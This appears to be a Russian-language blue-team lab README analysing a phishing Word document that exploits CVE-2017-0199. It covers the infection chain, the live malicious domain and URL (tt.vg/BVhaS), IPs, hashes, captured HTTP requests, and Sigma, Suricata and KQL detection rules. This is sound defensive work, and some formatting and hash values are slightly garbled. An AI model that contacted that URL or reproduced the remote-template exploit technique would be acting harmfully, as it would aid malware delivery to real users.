
Этот репозиторий содержит полный анализ вредоносного ПО с точки зрения blue team реального вредоносного DOCX, эксплуатирующего CVE-2017-0199. Лабораторная работа включает выполнение в песочнице, сетевую криминалистику, извлечение IOC, сопоставление с MITRE ATT&CK, проверку сброшенных файлов и правила обнаружения. Скриншоты доказательств включены в папку evidence для профессиональной документации.
Детонация сложного вредоносного ПО • Поведение эксплойта • IOCs • Инженерия обнаружения
Этот репозиторий документирует **реальный вредоносный DOCX**-файл, эксплуатирующий уязвимость **CVE-2017-0199** Microsoft Office (RCE). Образец был детонирован в песочнице **Windows 10 ANY.RUN**, что позволило выявить:
✔ Полную цепочку эксплуатации
✔ Сетевые колбэки на вредоносный домен (tt.vg)
✔ Сброшенные файлы и временные артефакты
✔ JA3-отпечатки
✔ Активность в реестре
✔ HTTP/HTTPS-биконинг от WINWORD.EXE
✔ Полный набор IOCs и правил обнаружения для Blue Team
Документ под названием «BankPaymAdviceVend.Report.docx» был получен через фишинговое письмо.
После детонации ANY.RUN мгновенно пометил его как вредоносный и связал с:
tt.vg/BVhaS
[ Вредоносный DOCX ] │ ▼ [ Пользователь открывает в Word ] │ ▼ [ Срабатывание эксплойта CVE-2017-0199 ] │ ▼ [WINWORD.EXE → tt.vg через HTTP/HTTPS] │ ▼ [Удалённый путь: /BVhaS (GET / HEAD / OPTIONS)] │ ▼ [Сброшены временные файлы, EMF-объекты, файлы кэша] │ ▼ [Потенциальная полезная нагрузка следующего этапа — сервер вернул 404]
yaml Copy code
Только один домен был вредоносным:
| Домен | Репутация |
|---|---|
| tt.vg | 🔴 вредоносный |
Разрешённые IP-адреса:
188.114.96.3 188.114.97.3 172.67.138.42 (TLS v1.2)
yaml Copy code
Word пытался получить:
GET /BVhaS HEAD /BVhaS OPTIONS / Host: tt.vg User-Agent: Microsoft Office / MSIE 7 spoof
yaml Copy code
Типичный перехваченный запрос:
GET /BVhaS HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0...) Connection: Keep-Alive Host: tt.vg
arduino Copy code
Сервер ответил:
HTTP/1.1 404 Not Found
yaml Copy code
.tmp-файлов.glox%LOCALAPPDATA%\INetCache\Content.MSO\*.emf.LNKindex.datWord обращался к:
HKCU\Software\Microsoft\Office\14.0... HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings... HKLM\System\ControlSet001\Services\Tcpip\Parameters\Interfaces...
yaml Copy code
✔ Нормально для Office
❌ В сочетании с эксплойтом = явно вредоносное поведение
Тип: Удалённое выполнение кода (RCE)
Триггер: Вредоносный DOCX загружает удалённый HTA без взаимодействия с пользователем
Затронутые версии: Microsoft Word 2007–2016
Воздействие: Злоумышленник выполняет произвольный код
Этот образец пытается загрузить удалённую полезную нагрузку с:
yaml Copy code
Домен: tt.vg
URL-адреса: http://tt.vg/BVhaS https://tt.vg/BVhaS
IP-адреса: 188.114.96.3 188.114.97.3 172.67.138.42
shell Copy code
091f51a7a1c3a4504a224cc081ce9cee 46f5131e766d248db0248a86c494b71c 65005c9d9ae0f0ebeaf22c210571d482 ...
yaml Copy code
Этот раздел преобразует технический анализ BankPaymAdviceVend.Report.docx в практические, готовые к развёртыванию артефакты обнаружения, которые SOC или Blue Team могут сразу же использовать. В него входят правила Sigma, сигнатуры Suricata IDS и поисковые запросы EDR.
Это правило Sigma обнаруживает любое сетевое соединение, инициированное WINWORD.EXE
с подозрительным коротким доменом tt.vg в журналах сети Windows.
title: WINWORD Connecting To Suspicious Short Domain tt.vg
id: 0b2a5f3d-ttvg-word
status: experimental
logsource:
category: network_connection
product: windows
detection:
selection:
Image|endswith: '\WINWORD.EXE'
DestinationHostname: 'tt.vg'
condition: selection
level: high
tags:
- attack.command_and_control
- attack.t1071.001
- cve.2017-0199
💡 Любая устаревшая система Office, связывающаяся с tt.vg через WINWORD.EXE,
должна незамедлительно запускать расследование.
/BVhaS на tt.vg
Правило Suricata IDS, которое выявляет исходящий от Office запрос
GET /BVhaS на вредоносный домен tt.vg.
Это фиксирует попытку эксплойта получить полезную нагрузку.
alert http $HOME_NET any -> $EXTERNAL_NET any (
msg:"C2 – Office WINWORD GET /BVhaS on tt.vg";
flow:established,to_server;
http.method; content:"GET";
http.uri; content:"/BVhaS"; nocase;
http.host; content:"tt.vg"; nocase;
http.user_agent; content:"MSOffice"; nocase;
reference:cve,2017-0199;
classtype:trojan-activity;
sid:4200010;
rev:1;
)
🔥 Высокоэффективно в средах, использующих Suricata или Zeek для мониторинга исходящего трафика.
Поисковый запрос KQL (Microsoft Defender), используемый для выявления любой машины в среде,
демонстрирующей аналогичный вредоносный биконинг на tt.vg или связанные с ним IP-адреса.
DeviceNetworkEvents
| where InitiatingProcessFileName == "WINWORD.EXE"
| where RemoteUrl in ("tt.vg")
or RemoteIp in ("188.114.96.3","188.114.97.3","172.67.138.42")
🎯 Цель: расширить одиночную детонацию в песочнице до полномасштабного поиска по всему предприятию.
Эта лабораторная работа демонстрирует вашу способность анализировать реальный фишинговый DOCX-образец от начала до конца, следуя полной методологии уровня SOC:
WINWORD.EXE становится неожиданным HTTP/S-клиентом.Иными словами — эта лабораторная работа не останавливается на детонации. Она извлекает реальные, практически применимые данные для обнаружения точно так же, как профессиональный аналитик SOC.
Разработано и задокументировано Ahmed Tarek — Blue Team
| Поле | Значение |
|---|
| Файл | BankPaymAdviceVend.Report.docx |
| Вердикт | Вредоносная активность |
| Теги | cve-2017-0199, exploit |
| MD5 | 22EDED727467A9A26F3FD311A12A7E |
| SHA1 | 6738D1A969193459C7C7579956269D77FED8D26F |
| SHA256 | 2E1408013503C...3D6EAF9 |
| Песочница | Windows 10 Pro x64 |
| Поведение | Эксплойт → Сетевой биконинг → Сброшенные файлы |